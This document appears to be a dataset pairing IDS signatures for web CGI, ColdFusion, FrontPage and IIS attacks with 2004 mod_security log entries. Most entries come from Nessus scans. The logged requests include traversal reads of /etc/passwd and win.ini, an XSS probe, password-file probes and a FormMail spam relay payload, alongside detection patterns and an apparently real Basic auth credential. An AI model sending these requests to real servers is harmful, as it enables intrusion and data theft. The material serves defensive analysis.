865	CA-1996-11	attempted-recon	WEB-CGI ksh access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/ksh HTTP/1.1" 403 295 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ksh ---------------------------------------- GET /cgi-bin/ksh HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
867	Nessus 10295 CAN-1999-1970 BID1808	attempted-recon	WEB-CGI visadmin.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:31 2004] "GET /cgi-bin/visadmin.exe HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/visadmin.exe] for 50000 ms ---------------------------------------- GET /cgi-bin/visadmin.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/visadmin\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
869	CAN-1999-1178	attempted-recon	WEB-CGI dumpenv.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:43:00 2004] "GET /cgi-bin/dumpenv.pl HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/dumpenv.pl ---------------------------------------- GET /cgi-bin/dumpenv.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
872	CA-1996-11	attempted-recon	WEB-CGI tcsh access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/tcsh HTTP/1.1" 403 296 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/tcsh ---------------------------------------- GET /cgi-bin/tcsh HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
873	arachNIDS 227 BID2300 CVE-1999-0236	attempted-recon	WEB-CGI scriptalias access	Request: 67.125.134.117 - - [Thu Mar 11 05:10:37 2004] "GET http:///www.christinamodel.com/members/index.html HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/www.christinamodel.com/members/index.html] for 50000 ms ---------------------------------------- GET http:///www.christinamodel.com/members/index.html HTTP/1.0 Accept: / Accept-Language: en-us,en;q=0.5 Authorization: Basic cHIwdDNzdDpsb3Zlc3lvdQ== Host: Pragma: no-cache Referer: Http://www.christinamodel.com/members/index.html User-Agent: Mozilla/4.7 ( compatible; [jp]; Windows 98; DigiExt ) mod_security-message: Access denied with code 200. Pattern match "Basic" at HEADER. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
875	Nessus 10008 CVE-1999-0178 arachNIDS 231 BID2078	attempted-recon	WEB-CGI win-c-sample.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:47:36 2004] "GET /cgi-shl/win-c-sample.exe HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/cgi-shl/win-c-sample.exe] for 50000 ms ---------------------------------------- GET /cgi-shl/win-c-sample.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/win-c-sample\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
882		attempted-recon	WEB-CGI calendar access	Request: 218.4.51.134 - - [Thu Mar 11 09:09:48 2004] "GET http://www.orbitz.com/img/icons/calendar.gif HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://www.orbitz.com/img/icons/calendar.gif] for 50000 ms ---------------------------------------- GET http://www.orbitz.com/img/icons/calendar.gif HTTP/1.0 Accept: / Accept-Language: zh-cn Cookie: OSC=AQymyFJOpw!1406451595; OrbitzID=10790141182870; OrbitzRegistration=N,0,0,0 Host: www.orbitz.com If-Modified-Since: Fri, 27 Jun 2003 21:02:04 GMT If-None-Match: "64c07e-176-3efcb0cc" Proxy-Connection: Keep-Alive Referer: http://www.orbitz.com/?referralcode=?s User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/calendar" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
884	arachNIDS 226 CVE-1999-0172 BID1187 Nessus 10076 Nessus 10782	web-application-activity	WEB-CGI formmail access	Request: 67.83.151.132 - - [Wed Mar 10 02:58:00 2004] "POST http://www.buckhickman.co.uk/cgi-bin/FormMail.pl HTTP/1.1" 200 578 Handler: proxy-server Error: mod_security: Invalid character detected [13] ---------------------------------------- POST http://www.buckhickman.co.uk/cgi-bin/FormMail.pl HTTP/1.1 Accept: / Connection: Close Content-Length: 407 Content-Type: application/x-www-form-urlencoded Host: www.buckhickman.co.uk Proxy-Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705) mod_security-action: 200 email=adelinaeo@thenetanywhere.com&realname=adelinaeo@thenetanywhere.com&recipient=<aazual8@aol.com>www.buckhickman.co.uk%2C&subject=11%3A56%3A53%20PM%20Live!++++++++++++d3v39&15=%0D%0A%0D%0A%0A%0A%0A%0A%0A%0A%0D%0Anhs%0D%0A%0D%0Aaazual8%20Visit%20http%3A%2F%2Fconnect.to%2Ffriendscams%20to%20talk%20to%20these%20girls%20LIVE!%0D%0A%0A%0A%0A%0A%0D%0A11%3A56%3A53%20PM%0D%0A3%2F9%2F2004%0A%0A%0A%0A%0A%0A5y3u HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
885	CA-1996-11 CAN-1999-0509	web-application-activity	WEB-CGI bash access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/bash HTTP/1.1" 403 296 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/bash ---------------------------------------- GET /cgi-bin/bash HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
889	securityfocus BID491	attempted-recon	WEB-CGI ppdscgi.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:56 2004] "GET /cgi-bin/ppdscgi.exe HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ppdscgi.exe ---------------------------------------- GET /cgi-bin/ppdscgi.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
890	scn BID5286 CAN-2002-0710	attempted-recon	WEB-CGI sendform.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:41 2004] "GET /cgi-bin/sendform.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/sendform.cgi ---------------------------------------- GET /cgi-bin/sendform.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=35 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
892	CVE-1999-0066 BID719	attempted-recon	WEB-CGI AnyForm2 access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:04 2004] "GET /cgi-bin/AnyForm2 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/AnyForm2] for 50000 ms ---------------------------------------- GET /cgi-bin/AnyForm2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/AnyForm2" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
895	CVE-2000-0382 BID1179	attempted-recon	WEB-CGI redirect access	Request: 220.175.18.42 - - [Tue Mar 9 22:47:40 2004] "GET http://65.17.208.131/search/search/redirect.php?s=5460953&r=1&l=1 HTTP/1.0" 302 0 Handler: proxy-server ---------------------------------------- GET http://65.17.208.131/search/search/redirect.php?s=5460953&r=1&l=1 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, / Accept-Encoding: deflate Accept-Language: en Cookie: stres=1; fc=SXJ3wn3VYaM Host: 65.17.208.131 Proxy-Connection: Keep-Alive Referer: http://www.searchlikecrazy.com/cgi-bin/smartsearch.cgi?keywords=Web+Design%20&username=arongyi User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2) mod_security-message: Access denied with code 200. Pattern match "/search" at THE_REQUEST. HTTP/1.0 302 Found Accept-Ranges: bytes X-Powered-By: PHP/4.2.2 Location: http://www.kanoodle.com/clickthrough.cool?position=7001&tid=bhngbnnobonpbgnkbknpzqrdxbxoyx&bid=0.09&eid=1&id=77810869&query=web%20design&clickid=23442688&UNQ=00107889044985920592&subid=10470 Content-Length: 0 Content-Type: text/html; charset=ISO-8859-1 X-Cache: MISS from www.testproxy.net Connection: close
896	Nessus 10610 CAN-2001-0214 BID2370	web-application-activity	WEB-CGI way-board access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:50 2004] "GET /way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1" 403 307 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/way-board ---------------------------------------- GET /way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
899	CAN-2001-0272 BID2504	web-application-attack	WEB-CGI Amaya templates sendtemp.pl directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:42:46 2004] "GET /cgi-bin/sendtemp.pl?templ=../../../../../etc/passwd HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/sendtemp.pl ---------------------------------------- GET /cgi-bin/sendtemp.pl?templ=../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
900	Nessus 10616 BID2362 CAN-2001-0211	web-application-attack	WEB-CGI webspirs.cgi directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:42:53 2004] "GET /webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webspirs.cgi ---------------------------------------- GET /webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
902	CAN-2001-0302	attempted-recon	WEB-CGI tstisapi.dll access	Request: 217.160.165.173 - - [Fri Mar 12 22:47:23 2004] "GET /isapi/tstisapi.dll HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/isapi/tstisapi.dll] for 50000 ms ---------------------------------------- GET /isapi/tstisapi.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "tstisapi\.dll" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
908	CVE-2000-0538	attempted-recon	WEB-COLDFUSION administrator access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:20 2004] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/CFIDE/administrator/index.cfm] for 50000 ms ---------------------------------------- GET /CFIDE/administrator/index.cfm HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/cfide/administrator/index\.cfm" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
911	BID550 CVE-1999-0455	attempted-recon	WEB-COLDFUSION exprcalc access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:54 2004] "GET /cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini HTTP/1.1" 403 311 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/cfdocs ---------------------------------------- GET /cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
937	BID2144	web-application-activity	WEB-FRONTPAGE _vti_rpc access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:41 2004] "POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0" 200 566 Handler: (null) Error: mod_security: Invalid character detected [13] ---------------------------------------- POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0 Accept: / Connection: Keep-Alive Content-Length: 58 Content-Type: application/x-www-form-urlencoded Date: Mon, 23 Mar 2003 00:00:15 GMT Host: 192.168.1.103 MIME-Version: 1.0 User-Agent: MSFrontPage/4.0 X-Vermeer-Content-Type: application/x-www-form-urlencoded mod_security-action: 200 method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
951	Nessus 10078 CVE-1999-0386	web-application-activity	WEB-FRONTPAGE authors.pwd access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:40 2004] "GET /_vti_pvt/authors.pwd HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/authors\.pwd" at THE_REQUEST. ---------------------------------------- GET /_vti_pvt/authors.pwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/authors\.pwd" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
960		web-application-activity	WEB-FRONTPAGE service.stp access	Request: 213.66.16.242 - - [Sat Mar 13 18:07:03 2004] "GET http://www.hypnogirls.com/_vti_pvt/service.stp HTTP/1.0" 302 280 Handler: proxy-server Error: mod_security: Warning. Pattern match "/_vti_pvt/service\.stp" at THE_REQUEST. ---------------------------------------- GET http://www.hypnogirls.com/_vti_pvt/service.stp HTTP/1.0 Accept: /, text/html mod_security-message: Warning. Pattern match "/_vti_pvt/service\.stp" at THE_REQUEST. HTTP/1.0 302 Found Warning: Subject to Monitoring Location: http://www.hypnogirls.com Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from www.testproxy.net Connection: close
962	BID1174 BID1608 CAN-2000-0709 CAN-2000-0413 Nessus 10405	web-application-activity	WEB-FRONTPAGE shtml.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:48 2004] "GET /_vti_bin/shtml.exe/<script>alert(document.domain)</script> HTTP/1.1" 403 354 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/_vti_bin ---------------------------------------- GET /_vti_bin/shtml.exe/<script>alert(document.domain)</script> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
966	arachNIDS 248 CAN-2000-0153 BID989	web-application-attack	WEB-FRONTPAGE .... request	Request: 217.160.165.173 - - [Fri Mar 12 22:38:47 2004] "GET /................../config.sys HTTP/1.1" 403 313 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/.................. ---------------------------------------- GET /................../config.sys HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
967	ms00-025 arachNIDS 271 CVE-2000-0260 BID1108	web-application-activity	WEB-FRONTPAGE dvwssr.dll access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:19 2004] "GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.1" 404 308 Handler: (null) Error: mod_security: Warning. Pattern match "/dvwssr\.dll" at THE_REQUEST. ---------------------------------------- GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/_vti_bin/" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
971	arachNIDS 533 CAN-2001-0241	web-application-activity	WEB-IIS ISAPI .printer access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:26 2004] "GET /NULL.printer HTTP/1.1" 404 292 Handler: (null) Error: mod_security: Warning. Pattern match "\.printer" at THE_REQUEST. ---------------------------------------- GET /NULL.printer HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.printer" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
972	CAN-1999-0253 BID1814	web-application-activity	WEB-IIS %2E-asp access	Request: 218.56.8.160 - - [Wed Mar 10 23:38:43 2004] "GET http://www.xuppa.com/cgi-local/click.cgi?o=97087&k=Films&partnerid=boopin&c=_b9pt_&pro=12835&srch=Films&pos=2&oid=12835&cthru=http%3A%2F%2Fpartners%2Emygeek%2Ecom%2Fpresults%2Ejsp%3Fpartnerid%3D%39%38%36%38%39%26vendorId%3D%39%37%30%38%37%26type%3D%31%26code%3D%30%26rate%3D%38%34%35%33%36%32%33%36%32%26cr%3D%38%34%35%33%36%32%33%36%32%26domain%3Dtrack%2Edid%2Dit%2Ecom%26query%3D%31%30%37%38%39%37%39%38%36%32%37%35%32%25%33A%25%33A%36%38%2E%34%38%2E%31%30%36%2E%31%30%39%25%33A%25%33AFilms%26url%3Dhttp%25%33A%25%32F%25%32Fwww%2Elooksmart%2Ecom%25%32Fog%25%32Fpr%25%33DPsr%25%33Bro%25%33D%32%25%33Brc%25%33D%34%25%33Bla%25%33D%32%31%38%30%32%35%25%33Blm%25%33D%31%32%31%30%36%32%25%33Bli%25%33D%31%30%32%32%37%32%36%31%32%25%33Bed%25%33D%32%30%30%33%30%38%31%33%25%33Bii%25%33D%38%30%36%34%2E%37%34%35%38%2E%34%30%34fe%36e%39%2E%36%35%33%35%25%33Bpn%25%33D%25%33Bto%25%33D%25%33Btc%25%33D%34%25%33Bpo%25%33D%32%25%33Bpc%25%33D%34%25%33Bpi%25%33Dlzd%25%33Bts%25%33D%25%37Chttp%25%33A%25%32F%25%32Ftrack%2Edid%2Dit%2Ecom%25%32Fn%25%33Flid%25%33D%36%35%37%38%30%38%37%25%32%36tid%25%33D%33edb%39%35%31%31%36b%36cd%25%32%36url%25%33Dhttp%25%33A%25%32F%25%32Fwww%2Eassociatedbag%2Ecom%25%32Fcategory%2Easp%25%33Fcatalog%25%32%35%35Fname%25%33DAssociatedBagCatalog%25%32%36class%25%33DFLM%25%32%36parent%25%33D%25%32%36category%25%32%35%35Fname%25%33DFLM%25%32%36Page%25%33D%31%3Ab%30%2E%30%33 HTTP/1.1" 302 938 Handler: proxy-server ---------------------------------------- GET http://www.xuppa.com/cgi-local/click.cgi?o=97087&k=Films&partnerid=boopin&c=_b9pt_&pro=12835&srch=Films&pos=2&oid=12835&cthru=http%3A%2F%2Fpartners%2Emygeek%2Ecom%2Fpresults%2Ejsp%3Fpartnerid%3D%39%38%36%38%39%26vendorId%3D%39%37%30%38%37%26type%3D%31%26code%3D%30%26rate%3D%38%34%35%33%36%32%33%36%32%26cr%3D%38%34%35%33%36%32%33%36%32%26domain%3Dtrack%2Edid%2Dit%2Ecom%26query%3D%31%30%37%38%39%37%39%38%36%32%37%35%32%25%33A%25%33A%36%38%2E%34%38%2E%31%30%36%2E%31%30%39%25%33A%25%33AFilms%26url%3Dhttp%25%33A%25%32F%25%32Fwww%2Elooksmart%2Ecom%25%32Fog%25%32Fpr%25%33DPsr%25%33Bro%25%33D%32%25%33Brc%25%33D%34%25%33Bla%25%33D%32%31%38%30%32%35%25%33Blm%25%33D%31%32%31%30%36%32%25%33Bli%25%33D%31%30%32%32%37%32%36%31%32%25%33Bed%25%33D%32%30%30%33%30%38%31%33%25%33Bii%25%33D%38%30%36%34%2E%37%34%35%38%2E%34%30%34fe%36e%39%2E%36%35%33%35%25%33Bpn%25%33D%25%33Bto%25%33D%25%33Btc%25%33D%34%25%33Bpo%25%33D%32%25%33Bpc%25%33D%34%25%33Bpi%25%33Dlzd%25%33Bts%25%33D%25%37Chttp%25%33A%25%32F%25%32Ftrack%2Edid%2Dit%2Ecom%25%32Fn%25%33Flid%25%33D%36%35%37%38%30%38%37%25%32%36tid%25%33D%33edb%39%35%31%31%36b%36cd%25%32%36url%25%33Dhttp%25%33A%25%32F%25%32Fwww%2Eassociatedbag%2Ecom%25%32Fcategory%2Easp%25%33Fcatalog%25%32%35%35Fname%25%33DAssociatedBagCatalog%25%32%36class%25%33DFLM%25%32%36parent%25%33D%25%32%36category%25%32%35%35Fname%25%33DFLM%25%32%36Page%25%33D%31%3Ab%30%2E%30%33 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en Cache-Control: no-cache Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Host: www.xuppa.com Referer: http://boopin.com/s.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) mod_security-message: Access denied with code 200. Pattern match "\.asp" at THE_REQUEST. HTTP/1.1 302 Found Set-Cookie: ks12835=Filmshttp%3A%2F%2Fpartners.mygeek.com%2Fpresults.jsp%3Fpartnerid%3D98689%26vendorId%3D97087%26type%3D1%26code%3D0%26rate%3D845362362%26cr%3D845362362%26domain%3Dtrack.did-it.com%26query%3D1078979862752%253A%253A192.168.1.103%253A%253AFilms%26url%3Dhttp%253A%252F%252Fwww.looksmart.com%252Fog%252Fpr%253DPsr%253Bro%253D2%253Brc%253D4%253Bla%253D218025%253Blm%253D121062%253Bli%253D102272612%253Bed%253D20030813%253Bii%253D8064.7458.404fe6e9.6535%253Bpn%253D%253Bto%253D%253Btc%253D4%253Bpo%253D2%253Bpc%253D4%253Bpi%253Dlzd%253Bts%253D%257Chttp%253A%252F%252Ftrack.did-it.com%252Fn%253Flid%253D6578087%2526tid%253D3edb95116b6cd%2526url%253Dhttp%253A%252F%252Fwww.associatedbag.com%252Fcategory.asp%253Fcatalog%25255Fname%253DAssociatedBagCatalog%2526class%253DFLM%2526parent%253D%2526category%25255Fname%253DFLM%2526Page%253D1&1078979909&time&1078979909; domain=.xuppa.com; path=/; expires=Fri, 12-Mar-2004 04:38:29 GMT Location: http://partners.mygeek.com/presults.jsp?partnerid=98689&vendorId=97087&type=1&code=0&rate=845362362&cr=845362362&domain=track.did-it.com&query=1078979862752%3A%3A192.168.1.103%3A%3AFilms&url=http%3A%2F%2Fwww.looksmart.com%2Fog%2Fpr%3DPsr%3Bro%3D2%3Brc%3D4%3Bla%3D218025%3Blm%3D121062%3Bli%3D102272612%3Bed%3D20030813%3Bii%3D8064.7458.404fe6e9.6535%3Bpn%3D%3Bto%3D%3Btc%3D4%3Bpo%3D2%3Bpc%3D4%3Bpi%3Dlzd%3Bts%3D%7Chttp%3A%2F%2Ftrack.did-it.com%2Fn%3Flid%3D6578087%26tid%3D3edb95116b6cd%26url%3Dhttp%3A%2F%2Fwww.associatedbag.com%2Fcategory.asp%3Fcatalog%255Fname%3DAssociatedBagCatalog%26class%3DFLM%26parent%3D%26category%255Fname%3DFLM%26Page%3D1 Content-Type: text/plain Via: 1.1 www.xuppa.com X-Cache: MISS from www.xuppa.com, MISS from www.testproxy.net Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked
977		web-application-activity	WEB-IIS .cnf access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:53 2004] "GET /_vti_pvt%5caccess.cnf HTTP/1.1" 403 303 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/_vti_pvt\access.cnf ---------------------------------------- GET /_vti_pvt%5caccess.cnf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
